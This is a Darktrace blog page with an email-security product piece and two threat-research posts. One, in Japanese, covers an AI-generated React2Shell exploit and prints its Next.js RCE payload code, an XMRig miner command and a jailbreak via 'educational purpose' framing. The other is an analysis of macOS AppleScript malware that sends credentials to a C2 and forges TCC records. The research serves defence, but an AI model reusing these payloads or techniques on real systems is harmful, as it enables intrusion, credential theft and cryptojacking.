ブログ
/
Email
/
April 10, 2023

Employee-Conscious Email Security Solutions in the Workforce

Email threats commonly affect organizations. Read Darktrace's expert insights on how to safeguard your business by educating employees about email security.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Written by
Carlos Gray
Senior Product Marketing Manager, Email
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
10
Apr 2023

When considering email security, IT teams have historically had to choose between excluding employees entirely, or including them but giving them too much power and implementing unenforceable, trust-based policies that try to make up for it. 

However, just because email security should not rely on employees, this does not mean they should be excluded entirely. Employees are the ones interacting with emails daily, and their experiences and behaviors can provide valuable security insights and even influence productivity. 

AI technology supports employee engagement in this non-intrusive, nuanced way to not only maintain email security, but also enhance it. 

Finding a Balance of Employee Involvement in Security Strategies

Historically, security solutions offered ‘all or nothing’ approaches to employee engagement. On one hand, when employees are involved, they are unreliable. Employees cannot all be experts in security on top of their actual job responsibilities, and mistakes are bound to happen in fast-paced environments.  

Although there have been attempts to raise security awareness, they often have shortcomings, as training emails lack context and realism, leaving employees with poor understandings that often lead to reporting emails that are actually safe. Having users constantly triaging their inboxes and reporting safe emails wastes time that takes away from their own productivity as well as the productivity of the security team.

Other historic forms of employee involvement also put security at risk. For example, users could create blanket rules through feedback, which could lead to common problems like safe-listing every email that comes from the gmail.com domain. Other times, employees could choose for themselves to release emails without context or limitations, introducing major risks to the organization. While these types of actions include employees to participate in security, they do so at the cost of security. 

Even lower stakes employee involvement can prove ineffective. For example, excessive warnings when sending emails to external contacts can lead to banner fatigue. When employees see the same warning message or alert at the top of every message, it’s human nature that they soon become accustomed and ultimately immune to it.

On the other hand, when employees are fully excluded from security, an opportunity is missed to fine-tune security according to the actual users and to gain feedback on how well the email security solution is working. 

So, both options of historically conventional email security, to include or exclude employees, prove incapable of leveraging employees effectively. The best email security practice strikes a balance between these two extremes, allowing more nuanced interactions that maintain security without interrupting daily business operations. This can be achieved with AI that tailors the interactions specifically to each employee to add to security instead of detracting from it. 

Reducing False Reports While Improving Security Awareness Training 

Humans and AI-powered email security can simultaneously level up by working together. AI can inform employees and employees can inform AI in an employee-AI feedback loop.  

By understanding ‘normal’ behavior for every email user, AI can identify unusual, risky components of an email and take precise action based on the nature of the email to neutralize them, such as rewriting links, flattening attachments, and moving emails to junk. AI can go one step further and explain in non-technical language why it has taken a specific action, which educates users. In contrast to point-in-time simulated phishing email campaigns, this means AI can share its analysis in context and in real time at the moment a user is questioning an email. 

The employee-AI feedback loop educates employees so that they can serve as additional enrichment data. It determines the appropriate levels to inform and teach users, while not relying on them for threat detection

In the other direction, the AI learns from users’ activity in the inbox and gradually factors this into its decision-making. This is not a ‘one size fits all’ mechanism – one employee marking an email as safe will never result in blanket approval across the business – but over time, patterns can be observed and autonomous decision-making enhanced.  

Figure 1: The employee-AI feedback loop increases employee understanding without putting security at risk.

The employee-AI feedback loop draws out the maximum potential benefits of employee involvement in email security. Other email security solutions only consider the security team, enhancing its workflow but never considering the employees that report suspicious emails. Employees who try to do the right thing but blindly report emails never learn or improve and end up wasting their own time. By considering employees and improving security awareness training, the employee-AI feedback loop can level up users. They learn from the AI explanations how to identify malicious components, and so then report fewer emails but with greater accuracy. 

While AI programs have classically acted like black boxes, Darktrace trains its AI on the best data, the organization’s actual employees, and invites both the security team and employees to see the reasoning behind its conclusions. Over time, employees will trust themselves more as they better learn how to discern unsafe emails. 

Leveraging AI to Generate Productivity Gains

Uniquely, AI-powered email security can have effects outside of security-related areas. It can save time by managing non-productive email. As the AI constantly learns employee behavior in the inbox, it becomes extremely effective at detecting spam and graymail – emails that aren't necessarily malicious, but clutter inboxes and hamper productivity. It does this on a per-user basis, specific to how each employee treats spam, graymail, and newsletters. The AI learns to detect this clutter and eventually learns which to pull from the inbox, saving time for the employees. This highlights how security solutions can go even further than merely protecting the email environment with a light touch, to the point where AI can promote productivity gains by automating tasks like inbox sorting.

Preventing Email Mishaps: How to Deal with Human Error

Improved user understanding and decision making cannot stop natural human error. Employees are bound to make mistakes and can easily send emails to the wrong people, especially when Outlook auto-fills the wrong recipient. This can have effects ranging anywhere from embarrassing to critical, with major implications on compliance, customer trust, confidential intellectual property, and data loss. 

However, AI can help reduce instances of accidentally sending emails to the wrong people. When a user goes to send an email in Outlook, the AI will analyze the recipients. It considers the contextual relationship between the sender and recipients, the relationships the recipients have with each other, how similar each recipient’s name and history is to other known contacts, and the names of attached files.  

If the AI determines that the email is outside of a user’s typical behavior, it may alert the user. Security teams can customize what the AI does next: it can block the email, block the email but allow the user to override it, or do nothing but invite the user to think twice. Since the AI analyzes each email, these alerts are more effective than consistent, blanket alerts warning about external recipients, which often go ignored. With this targeted approach, the AI prevents data leakage and reduces cyber risk. 

Since the AI is always on and continuously learning, it can adapt autonomously to employee changes. If the role of an employee evolves, the AI will learn the new normal, including common behaviors, recipients, attached file names, and more. This allows the AI to continue effectively flagging potential instances of human error, without needing manual rule changes or disrupting the employee’s workflow. 

Email Security Informed by Employee Experience

As the practical users of email, employees should be considered when designing email security. This employee-conscious lens to security can strengthen defenses, improve productivity, and prevent data loss.  

In these ways, email security can benefit both employees and security teams. Employees can become another layer of defense with improved security awareness training that cuts down on false reports of safe emails. This insight into employee email behavior can also enhance employee productivity by learning and sorting graymail. Finally, viewing security in relation to employees can help security teams deploy tools that reduce data loss by flagging misdirected emails. With these capabilities, Darktrace/Email™ enables security teams to optimize the balance of employee involvement in email security.

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Written by
Carlos Gray
Senior Product Marketing Manager, Email

Blog

/

Network

/

February 12, 2026

AI/LLMで生成されたマルウェアを使ったReact2Shellエクスプロイト

Default blog imageDefault blog image

はじめに

敵対者の行動をリアルタイムに観測するため、ダークトレースは“CloudyPots” と呼ばれるグローバルなハニーポットネットワークを運用しています。CloudyPotsは幅広いサービス、プロトコル、クラウドプラットフォームに渡って悪意あるアクティビティを捕捉するように設計されています。こうしたハニーポットはインターネットに接続されているインフラを狙う脅威のテクニック、ツール、マルウェアについて貴重な情報を提供してくれます。

最近観測されたダークトレースのCloudypots環境に対する侵入インシデントは、React2Shell 脆弱性をエクスプロイトする完全にAI生成のマルウェアを明らかにしました、AI 支援ソフトウェア開発(“vibecoding”とも呼ばれます)が広く普及するにつれ、攻撃者はますます大規模言語モデルを使って迅速にツールを開発するようになっています。このインシデントは状況の大きな変化を表しています。AIによって、今では低スキルのオペレーターであっても効果的なエクスプロイトのフレームワークを短期間に作りだすことが可能となっているのです。このブログでは、攻撃チェーンを精査し、AI生成ペイロードを分析し、この変化が防御者にとって何を意味するかを解説します。

初期アクセス

ダークトレースのdockerハニーポットに対して侵入が観測されました。これは意図的にDockerデーモンを認証なしでインターネットに露出させています。この設定により任意の攻撃者がデーモンを発見しDocker APIを通じてコンテナを作成することが可能です。 

攻撃者は“python-metrics-collector”という名前のコンテナを生成しました。これにはcurl、wget、python 3を含む必要ツールを最初にインストールするスタートアップコマンドが設定されていました。

Container spawned with the name ‘python-metrics-collector’.
図1:‘python-metrics-collector’ という名前で生成されたコンテナ

次に、必要な一連のpythonパッケージを次からダウンロードします

  • hxxps://pastebin[.]com/raw/Cce6tjHM,

最後に次からpythonスクリプトをダウンロードして実行します

  • hxxps://smplu[.]link/dockerzero.

このリンクは“hackedyoulol”がホストするGitHub Gistにリダイレクトされますが、このアカウントは本ブログ執筆時点でGitHubから利用停止措置を受けています。

  • hxxps://gist.githubusercontent[.]com/hackedyoulol/141b28863cf639c0a0dd563344101f24/raw/07ddc6bb5edac4e9fe5be96e7ab60eda0f9376c3/gistfile1.txt

注目すべき点は、dockerを狙ったマルウェアであるにもかかわらずこのスクリプトにdockerスプレッダーが含まれていなかったことです。これは、感染の拡大が別に中央管理されたスプレッダーサーバーで処理されている可能性が高いことを示しています。

展開されたコンポーネントと実行チェーン

ダウンロードされたPythonペイロードは侵入のための中心的な実行コンポーネントでした。マルウェア自体が難読化設計となっており、エクスプロイトスクリプトと拡散メカニズムの間でこの難読化が強化されていました。dockerマルウェアには通常、自身のスプレッダーロジックが含まれているため、これが欠けているということは攻撃者が拡散専用のツールをリモートで管理し、実行していることを示唆しています。

スクリプトは複数行のコメントで始まっています:
"""
   Network Scanner with Exploitation Framework
   Educational/Research Purpose Only
   Docker-compatible: No external dependencies except requests
"""

これは非常に多くのことを語っています。当社が分析したサンプルのほとんどではファイル内にこのレベルのコメントは含まれていません。多くの場合それらは分析を阻害するために意図的に理解しにくく設計されています。人間のオペレーターが短時間に記述したスクリプトはたいていの場合わかりやすさよりもスピードと機能を優先しています。一方、LLMはすべてのコードに対して詳しくコメントを記録するよう設計されており、このサンプルにも繰り返しこのパターンが表れています。 さらに、AIはそのセーフガードの一環としてマルウェアの生成を拒否します。

さらに、“Educational/ResearchPurpose Only(教育/研究目的専用)” というフレーズが含まれていることは、攻撃者が悪意ある要求を教育目的と偽ることによって、AIモデルのジェイルブレイクを行ったことを示唆しています。

さらにスクリプトの一部をAI 検知ソフトウェアでテストしたところ、その出力結果はコードがおそらくLLMによって生成されているということを示していました。

GPTZero AI-detection results indicating that the script was likely generated using an AI model.
図2:GPTZeroによるAI検知の結果は、スクリプトがAIモデルを使って生成された可能性を示しています。

スクリプトはよくできたReact2Shellエクスプロイトツールキットであり、リモートコード実行を行いXMRig (Monero) 暗号通貨マイニングマルウェアを展開しようとするものです。 IP生成ループを使って標的を見つけだし、以下を含むエクスプロイトリクエストを実行します:

  • 念入りに構成されたNext.jsサーバーコンポーネントペイロード
  • 実行を強制しコマンド出力を明らかにするよう設計されたチャンク
  • 任意のシェルコマンドを実行する子プロセス起動

  def execute_rce_command(base_url, command, timeout=120):  
   """ ACTUAL EXPLOIT METHOD - Next.js React Server Component RCE
   DO NOT MODIFY THIS FUNCTION
   Returns: (success, output)  
   """  
try: # Disable SSL warnings     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

 crafted_chunk = {
      "then": "$1:__proto__:then",
      "status": "resolved_model",
      "reason": -1,
      "value": '{"then": "$B0"}',
      "_response": {
          "_prefix": f"var res = process.mainModule.require('child_process').execSync('{command}', {{encoding: 'utf8', maxBuffer: 50 * 1024 * 1024, stdio: ['pipe', 'pipe', 'pipe']}}).toString(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
          "_formData": {
              "get": "$1:constructor:constructor",
          },
      },
  }

  files = {
      "0": (None, json.dumps(crafted_chunk)),
      "1": (None, '"$@0"'),
  }

  headers = {"Next-Action": "x"}

  res = requests.post(base_url, files=files, headers=headers, timeout=timeout, verify=False)

この関数は最初 ‘whoami’を使って起動され、ホストが脆弱かどうかを判断し、次にwgetを使ってGitHubレポジトリからXMRigをダウンロードし、設定されたマイニングツールとウォレットアドレスを指定してこれを起動します。

]\

WALLET = "45FizYc8eAcMAQetBjVCyeAs8M2ausJpUMLRGCGgLPEuJohTKeamMk6jVFRpX4x2MXHrJxwFdm3iPDufdSRv2agC5XjykhA"
XMRIG_VERSION = "6.21.0"
POOL_PORT_443 = "pool.supportxmr.com:443"
...
print_colored(f"[EXPLOIT] Starting miner on {identifier} (port 443)...", 'cyan')  
miner_cmd = f"nohup xmrig-{XMRIG_VERSION}/xmrig -o {POOL_PORT_443} -u {WALLET} -p {worker_name} --tls -B >/dev/null 2>&1 &"

success, _ = execute_rce_command(base_url, miner_cmd, timeout=10)

多くの攻撃者が気づいていないことは、Moneroでは不透明なブロックチェーン(トランザクションを追跡できずウォレット残高が閲覧できない)が使われているものの、supportxmr等のマイニングプールは各ウォレットのアドレスに対する統計情報を公開していることです。これによりキャンペーンの成功と攻撃者の利益を追跡することは簡単に行えます。

 The supportxmr mining pool overview for the attackers wallet address
図3:supportxmrマイニングツールに表示される攻撃者のウォレットアドレス概要

この情報に基づき、この攻撃者はキャンペーン開始以来0.015 XMRを得ましたがこれは本ブログ執筆時点で5ポンド程度です。1日あたり、攻撃者は0.004 XMRを生成しており、これは1.33ポンドの価値です。ワーカー数は91であり、91のホストがこのサンプルに感染していることを意味しています。

まとめ

攻撃者が生成した金額はこのケースでは比較的少額であり、暗号通貨マイニングは新しいテクニックとは言えませんが、このキャンペーンはAIベースのLLMがサイバー犯罪を容易にした実例です。モデルとの1度のプロンプトセッションで、この攻撃者は機能するエクスプロイトフレームワークを生成し、90以上のホストを侵害することができています。これはAIベースのLLMによってサイバー犯罪がこれまで以上に簡単になったことを実証しており、攻撃者にとってのAIのオペレーション上の価値は過小評価されるべきではないことを示しています。

CISOおよびSOCのリーダーは、このインシデントを近い将来起こり得ることとして想定すべきです。脅威アクターは、今やオンデマンドでカスタムマルウェアを生成し、エクスプロイトを即座に改変し、侵害のすべての段階を自動化することができます。防御者は、迅速なパッチ適用、継続的なアタックサーフェスの監視、およびビヘイビアベースの検知アプローチを優先的に進める必要があります。AI 生成されたマルウェアはもはや理論上のものではなく、実際に運用されており、スケーラブルで、誰でもアクセスできるものなのです。

アナリストのコメント

ダウンロードされたスクリプトにDockerスプレッダーが含まれていないように見えることが注目に値します。これはこのマルウェアが感染したホストから他の被害者に複製されないことを意味しています。これはダークトレースの調査チームが分析した他のサンプルと比較して、Dockerマルウェアではあまりないことです。これは拡散のための別のスクリプトがあることを示しており、おそらく攻撃者が中央のスプレッダーサーバーから展開するものと思われます。この推論は接続を開始したIP、49[.]36.33.11が、インドの一般住宅用ISPに登録されていることからも成り立ちます。攻撃者が住宅用プロキシサーバーを使って形跡を隠している可能性もありますが、彼らの自宅のコンピューターから拡散用スクリプトを実行していることも考えられます。しかしこれは確認済みのアトリビューションと理解するべきではありません。

担当:Nathaniel Bill (Malware Research Engineer)、Nathaniel Jones (Nathaniel Jones, VP Threat Research | Field CISO AISecurity)

侵害インジケータ(IoC)

Spreader IP - 49[.]36.33.11
Malware host domain - smplu[.]link
Hash - 594ba70692730a7086ca0ce21ef37ebfc0fd1b0920e72ae23eff00935c48f15b
Hash 2 - d57dda6d9f9ab459ef5cc5105551f5c2061979f082e0c662f68e8c4c343d667d

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

Network

/

February 9, 2026

AppleScript Abuse: Unpacking a macOS Phishing Campaign

Default blog imageDefault blog image

Introduction

Darktrace security researchers have identified a campaign targeting macOS users through a multistage malware campaign that leverages social engineering and attempted abuse of the macOS Transparency, Consent and Control (TCC) privacy feature.

The malware establishes persistence via LaunchAgents and deploys a modular Node.js loader capable of executing binaries delivered from a remote command-and-control (C2) server.

Due to increased built-in security mechanisms in macOS such as System Integrity Protection (SIP) and Gatekeeper, threat actors increasingly rely on alternative techniques, including fake software and ClickFix attacks [1] [2]. As a result, macOS threats r[NJ1] ely more heavily on social engineering instead of vulnerability exploitation to deliver payloads, a trend Darktrace has observed across the threat landscape [3].

Technical analysis

The infection chain starts with a phishing email that prompts the user to download an AppleScript file named “Confirmation_Token_Vesting.docx.scpt”, which attemps to masquerade as a legitimate Microsoft document.

The AppleScript header prompting execution of the script.
Figure 1: The AppleScript header prompting execution of the script.

Once the user opens the AppleScript file, they are presented with a prompt instructing them to run the script, supposedly due to “compatibility issues”. This prompt is necessary as AppleScript requires user interaction to execute the script, preventing it from running automatically. To further conceal its intent, the malicious part of the script is buried below many empty lines, assuming a user likely will not to the end of the file where the malicious code is placed.

Curl request to receive the next stage.
Figure 2: Curl request to receive the next stage.

This part of the script builds a silent curl request to “sevrrhst[.]com”, sending the user’s macOS operating system, CPU type and language. This request retrieves another script, which is saved as a hidden file at in ~/.ex.scpt, executed, and then deleted.

The retrieved payload is another AppleScript designed to steal credentials and retrieve additional payloads. It begins by loading the AppKit framework, which enables the script to create a fake dialog box prompting the user to enter their system username and password [4].

 Fake dialog prompt for system password.
Figure 3: Fake dialog prompt for system password.

The script then validates the username and password using the command "dscl /Search -authonly <username> <password>", all while displaying a fake progress bar to the user. If validation fails, the dialog window shakes suggesting an incorrect password and prompting the user to try again. The username and password are then encoded in Base64 and sent to: https://sevrrhst[.]com/css/controller.php?req=contact&ac=<user>&qd=<pass>.

Figure 4: Requirements gathered on trusted binary.

Within the getCSReq() function, the script chooses from trusted Mac applications: Finder, Terminal, Script Editor, osascript, and bash. Using the codesign command codesign -d --requirements, it extracts the designated code-signing requirement from the target application. If a valid requirement cannot be retrieved, that binary is skipped. Once a designated requirement is gathered, it is then compiled into a binary trust object using the Code Signing Requirement command (csreq). This trust object is then converted into hex so it can later be injected into the TCC SQLite database.[NB2]

To bypass integrity checks, the TCC directory is renamed to com.appled.tcc using Finder. TCC is a macOS privacy framework designed to restrict application access to sensitive data, requiring users to explicitly grant permissions before apps can access items such as files, contacts, and system resources [1].

Example of how users interact with TCC.
Figure 5: TCC directory renamed to com.appled.TCC.
Figure 6: Example of how users interact with TCC.

After the database directory rename is attempted, the killall command is used on the tccd daemon to force macOS to release the lock on the database. The database is then injected with the forged access records, including the service, trusted binary path, auth_value, and the forged csreq binary. The directory is renamed back to com.apple.TCC, allowing the injected entries to be read and the permissions to be accepted. This enables persistence authorization for:

  • Full disk access
  • Screen recording
  • Accessibility
  • Camera
  • Apple Events 
  • Input monitoring

The malware does not grant permissions to itself; instead, it forges TCC authorizations for trusted Apple-signed binaries (Terminal, osascript, Script Editor, and bash) and then executes malicious actions through these binaries to inherit their permissions.

Although the malware is attempting to manipulate TCC state via Finder, a trusted system component, Apple has introduced updates in recent macOS versions that move much of the authorization enforcement into the tccd daemon. These updates prevent unauthorized permission modifications through directory or database manipulation. As a result, the script may still succeed on some older operating systems, but it is likely to fail on newer installations, as tcc.db reloads now have more integrity checks and will fail on Mobile Device Management (MDM) [NB5] systems as their profiles override TCC.

 Snippet of decoded Base64 response.
Figure 7: Snippet of decoded Base64 response.

A request is made to the C2, which retrieves and executes a Base64-encoded script. This script retrieves additional payloads based on the system architecture and stores them inside a directory it creates named ~/.nodes. A series of requests are then made to sevrrhst[.]com for:

/controller.php?req=instd

/controller.php?req=tell

/controller.php?req=skip

These return a node archive, bundled Node.js binary, and a JavaScript payload. The JavaScript file, index.js, is a loader that profiles the system and sends the data to the C2. The script identified the system platform, whether macOS, Linux or Windows, and then gathers OS version, CPU details, memory usage, disk layout, network interfaces, and running process. This is sent to https://sevrrhst[.]com/inc/register.php?req=init as a JSON object. The victim system is then registered with the C2 and will receive a Base64-encoded response.

LaunchAgent patterns to be replaced with victim information.
Figure 8: LaunchAgent patterns to be replaced with victim information.

The Base64-encoded response decodes to an additional Javacript that is used to set up persistence. The script creates a folder named com.apple.commonjs in ~/Library and copies the Node dependencies into this directory. From the C2, the files package.json and default.js are retrieved and placed into the com.apple.commonjs folder. A LaunchAgent .plist is also downloaded into the LaunchAgents directory to ensure the malware automatically starts. The .plist launches node and default.js on load, and uses output logging to log errors and outputs.

Default.js is Base64 encoded JavaScript that functions as a command loop, periodically sending logs to the C2, and checking for new payloads to execute. This gives threat actors ongoing and the ability to dynamically modify behavior without having to redeploy the malware. A further Base64-encoded JavaScript file is downloaded as addon.js.

Addon.js is used as the final payload loader, retrieving a Base64-encoded binary from https://sevrrhst[.]com/inc/register.php?req=next. The binary is decoded from Base64 and written to disk as “node_addon”, and executed silently in the background. At the time of analysis, the C2 did not return a binary, possibly because certain conditions were not met.  However, this mechanism enables the delivery and execution of payloads. If the initial TCC abuse were successful, this payload could access protected resources such as Screen Capture and Camera without triggering a consent prompt, due to the previously established trust.

Conclusion

This campaign shows how a malicious threat actor can use an AppleScript loader to exploit user trust and manipulate TCC authorization mechanisms, achieving persistent access to a target network without exploiting vulnerabilities.

Although recent macOS versions include safeguards against this type of TCC abuse, users should keep their systems fully updated to ensure the most up to date protections.  These findings also highlight the intentions of threat actors when developing malware, even when their implementation is imperfect.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Indicators of Compromise (IoCs)

88.119.171[.]59

sevrrhst[.]com

https://sevrrhst[.]com/inc/register.php?req=next

https://stomcs[.]com/inc/register.php?req=next
https://techcross-es[.]com

Confirmation_Token_Vesting.docx.scpt - d3539d71a12fe640f3af8d6fb4c680fd

EDD_Questionnaire_Individual_Blank_Form.docx.scpt - 94b7392133935d2034b8169b9ce50764

Investor Profile (Japan-based) - Shiro Arai.pdf.scpt - 319d905b83bf9856b84340493c828a0c

MITRE ATTACK

T1566 - Phishing

T1059.002 - Command and Scripting Interpreter: Applescript

T1059.004 – Command and Scripting Interpreter: Unix Shell

T1059.007 – Command and Scripting Interpreter: JavaScript

T1222.002 – File and Directory Permissions Modification

T1036.005 – Masquerading: Match Legitimate Name or Location

T1140 – Deobfuscate/Decode Files or Information

T1547.001 – Boot or Logon Autostart Execution: Launch Agent

T1553.006 – Subvert Trust Controls: Code Signing Policy Modification

T1082 – System Information Discovery

T1057 – Process Discovery

T1105 – Ingress Tool Transfer

References

[1] https://www.darktrace.com/blog/from-the-depths-analyzing-the-cthulhu-stealer-malware-for-macos

[2] https://www.darktrace.com/blog/unpacking-clickfix-darktraces-detection-of-a-prolific-social-engineering-tactic

[3] https://www.darktrace.com/blog/crypto-wallets-continue-to-be-drained-in-elaborate-social-media-scam

[4] https://developer.apple.com/documentation/appkit

[5] https://www.huntress.com/blog/full-transparency-controlling-apples-tcc

Continue reading
About the author
Tara Gould
Malware Research Lead
あなたのデータ × DarktraceのAI
唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ